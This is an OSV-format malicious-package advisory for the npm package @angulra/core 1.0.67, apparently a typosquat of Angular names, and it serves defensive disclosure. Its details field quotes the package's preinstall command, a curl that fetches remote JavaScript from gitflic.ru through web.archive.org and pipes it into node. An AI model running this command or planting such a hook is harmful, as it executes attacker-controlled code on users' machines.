{"id":"MAL-2026-17496","summary":"Malicious code in @angulra/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34)\nThe package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at `npm install` time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name `@angulra/core` resembles Angular ecosystem names while the package description (`Core Libs`) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running `npm install` on this package executes arbitrary remote code with the installing user's privileges.\n","modified":"2026-10-04T23:45:18.507063462Z","published":"2026-10-04T23:18:17Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020910","import_time":"2026-10-04T23:40:41.043648329Z","modified_time":"2026-10-04T23:18:17Z","sha256":"7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34","source":"amazon-inspector","versions":["1.0.67"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@angulra/core/v/1.0.67"}],"affected":[{"package":{"name":"@angulra/core","ecosystem":"npm","purl":"pkg:npm/%40angulra/core"},"versions":["1.0.67"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"d3f10c7b4cde21b539f30b278e1990ede4854a6d01d9b6a5c2d00792ba1a792d","tlsh":"6e117b20dd8c5ea316c209f928bdc8419565081b4d94bc9cf3ea040d8f5eaaf717a55d"}],"package_integrity":[{"filename":"core-1.0.67.tgz","hashes":{"sha1":"64ddfbbf45b2e088922cd2895774fa28e602c670","sha512_sri":"sha512-sJjjB2S5i7NvgT0Nsvg7IDWQGWzhiMn50XdDCxTLD53avqIiW3sieE3XXyZY6c5wwu0hiG42VL5VVMtVUyhk5w=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/core/MAL-2026-17496.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}